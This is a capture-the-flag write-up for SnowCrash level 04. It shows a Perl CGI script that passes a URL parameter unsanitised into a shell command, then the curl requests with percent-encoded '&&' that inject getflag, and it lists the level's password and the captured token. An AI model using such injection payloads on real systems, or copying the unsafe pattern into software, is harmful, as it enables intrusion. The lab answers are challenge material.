maix/snowcrash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
snowcrash/levels/04
History
Maieul BOYER ff90b625c5
level04
2026-01-19 16:27:08 +01:00
..
flag level04 2026-01-19 16:27:08 +01:00
passwd level04 2026-01-19 16:27:08 +01:00
README.md level04 2026-01-19 16:27:08 +01:00

README.md

Level 04

how to login

username: level04

password: qi0maab88jeaj46qoumi7maus

Goal

run getflag as user flag04

Actually doing something

level04@SnowCrash:~$ ll 
total 16
dr-xr-x---+ 1 level04 level04  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level04 level04  220 Apr  3  2012 .bash_logout*
-r-x------  1 level04 level04 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl*
-r-x------  1 level04 level04  675 Apr  3  2012 .profile*

Hmmm .pl. Lets dig out the dinosaur and have fun with some Perl

#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));

This reeks of exploit

As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter x and returns it

The issue is how it returns it...

It forward it to a shell string, and print the result. This is as secure as having a litteral endpoint that takes a command and return the result.

Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the echo command we can run whatever we want

for example getflag

we want this

  print `echo $y 2>&1`

to become

  print `echo idk && getflag 2>&1`

We are in shell, so we can remove the spaces around the && meaning that x must be equal to idk&&getflag

but if we do it dumbly, nothing happens

level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
idk

Why ?

Because & has a special meaning in urls, it separetes query arguments. we need to escape it.

How ?

The standard says to use percent-encoding. Reading a bit more it says that %26 is the escape code for &

lets replace it to get idk%26%26getflag and voila !

level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
GetExploited
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap

lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path

level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
idk
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap

Look mom, I recycle my stuff !